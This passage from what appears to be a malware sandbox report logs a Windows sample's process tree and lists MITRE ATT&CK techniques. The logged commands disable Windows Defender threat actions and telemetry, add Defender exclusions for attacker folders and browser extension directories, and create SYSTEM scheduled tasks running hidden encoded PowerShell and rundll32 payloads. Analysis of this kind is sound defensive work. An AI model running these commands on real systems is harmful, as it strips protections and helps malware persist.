    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5788
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1488
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4424
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5604
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4560
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3636
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4016
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4252
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4884
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1920
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3376
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1852
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1072
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3168
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQiasnoOYvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQiasnoOYvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UXKmdesHDltxC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UXKmdesHDltxC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezSgRKFUtDjsJGSpizR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezSgRKFUtDjsJGSpizR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iqEBBIrEU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iqEBBIrEU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nVpraLJvzXiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nVpraLJvzXiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\sgiNsKdMpOjwTvVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\sgiNsKdMpOjwTvVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DRMDPsTwbwzTeMqfl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DRMDPsTwbwzTeMqfl\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RLGfRDxPHWiJJkXy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RLGfRDxPHWiJJkXy\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:5660
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQiasnoOYvUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6108
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQiasnoOYvUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:628
    - - C:\Windows\SysWOW64\reg.exe
        
        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
        5⤵
        
        PID:5080
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQiasnoOYvUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:544
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RLGfRDxPHWiJJkXy /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5188
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RLGfRDxPHWiJJkXy /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5220
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DRMDPsTwbwzTeMqfl /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5192
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DRMDPsTwbwzTeMqfl /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5172
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:772
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5060
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2944
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\sgiNsKdMpOjwTvVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:696
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\sgiNsKdMpOjwTvVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6028
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVpraLJvzXiU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVpraLJvzXiU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6068
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iqEBBIrEU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6020
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iqEBBIrEU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6044
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezSgRKFUtDjsJGSpizR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6112
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezSgRKFUtDjsJGSpizR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6104
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UXKmdesHDltxC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4772
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
      4⤵
      PID:6084
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UXKmdesHDltxC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:224
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gNlixTRfP" /SC once /ST 00:44:44 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:2720
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gNlixTRfP"
  2⤵
  PID:5292
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gNlixTRfP"
  2⤵
  PID:5656
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "LfSOJyvpiPsPXgYOD" /SC once /ST 00:48:16 /RU "SYSTEM" /TR "\"C:\Windows\Temp\RLGfRDxPHWiJJkXy\PvpKRdYTwIYjZid\cxgpeJu.exe\" k9 /uHsite_idZrn 385118 /S" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:3396
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "LfSOJyvpiPsPXgYOD"
  2⤵
  PID:5436

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5392
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:1480

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:5056

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2352

C:\Windows\Temp\RLGfRDxPHWiJJkXy\PvpKRdYTwIYjZid\cxgpeJu.exe
C:\Windows\Temp\RLGfRDxPHWiJJkXy\PvpKRdYTwIYjZid\cxgpeJu.exe k9 /uHsite_idZrn 385118 /S
1⤵
PID:5768
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bVEVndcbdbMTLxjAoU"
  2⤵
  PID:4032
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\iqEBBIrEU\jtqRDq.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "zhFshwjjSJmGYbN" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:1228
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
  2⤵
  PID:4772
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
  2⤵
  PID:628
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "zhFshwjjSJmGYbN"
  2⤵
  PID:2100
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "zhFshwjjSJmGYbN"
  2⤵
  PID:5340
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "zhFshwjjSJmGYbN2" /F /xml "C:\Program Files (x86)\iqEBBIrEU\zEaoTCQ.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5312
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "bLDOEmMHfegXy2" /F /xml "C:\ProgramData\sgiNsKdMpOjwTvVB\TubnvLc.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5380
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "XjHPcezpdivcAy" /F /xml "C:\Program Files (x86)\nVpraLJvzXiU2\mhjyuUi.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:3364
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "DzTuHDozwZGCVadih2" /F /xml "C:\Program Files (x86)\ezSgRKFUtDjsJGSpizR\cFWvIKA.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5632
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "FMgzwJDZdWBDjnPchgv2" /F /xml "C:\Program Files (x86)\UXKmdesHDltxC\QqgqODh.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5600
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "YIFjRKsLWFuXselmV" /SC once /ST 00:08:52 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\RLGfRDxPHWiJJkXy\xpoJwDYW\vCUqlXM.dll\",#1 /HTsite_idFyk 385118" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:2616
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "YIFjRKsLWFuXselmV"
  2⤵
  PID:1204
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
  2⤵
  PID:6092
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
    3⤵
    PID:4392
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
  2⤵
  PID:3420
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
    3⤵
    PID:5176
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "LfSOJyvpiPsPXgYOD"
  2⤵
  PID:3232

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\RLGfRDxPHWiJJkXy\xpoJwDYW\vCUqlXM.dll",#1 /HTsite_idFyk 385118
1⤵
PID:3320
- C:\Windows\SysWOW64\rundll32.exe
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\RLGfRDxPHWiJJkXy\xpoJwDYW\vCUqlXM.dll",#1 /HTsite_idFyk 385118
  2⤵
  PID:736
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "YIFjRKsLWFuXselmV"
    3⤵
    PID:2124

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery